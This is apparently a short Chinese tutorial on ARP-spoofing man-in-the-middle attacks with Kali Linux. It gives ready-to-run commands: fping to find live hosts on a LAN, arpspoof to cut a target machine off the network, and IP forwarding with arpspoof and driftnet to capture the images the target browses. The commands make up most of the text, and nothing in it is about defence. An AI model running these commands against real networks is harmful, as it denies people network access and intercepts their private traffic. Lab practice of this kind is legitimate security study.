kali(中间人)arp攻击

0、简介

arp攻击又称为中间人攻击,是一种在局域网中使用的攻击手段。

1、断网攻击

攻击时,目标网络断开。攻击结束后,目标网络恢复。

1
2
3
4
# 探测存活主机
fping -a -g 192.168.118.1/24
# arpspoof -i 网卡 -t 目标IP 网关
arpspoof -i eth0 -t 192.168.118.138 192.168.118.2

img

img

img

2、arp欺骗

arp欺骗,首先要开启IP转发功能,否则会使目标机断网。

1
2
3
4
5
6
7
8
# 开启arp转发 0是关闭,1是开启
echo 1 > /proc/sys/net/ipv4/ip_forward

# arpspoof -i 网卡 -t 目标IP 网关
arpspoof -i eth0 -t 192.168.118.138 192.168.118.2

# 使用图片嗅探工具来捕获目标主机浏览的图片
driftnet -i eth0

img

img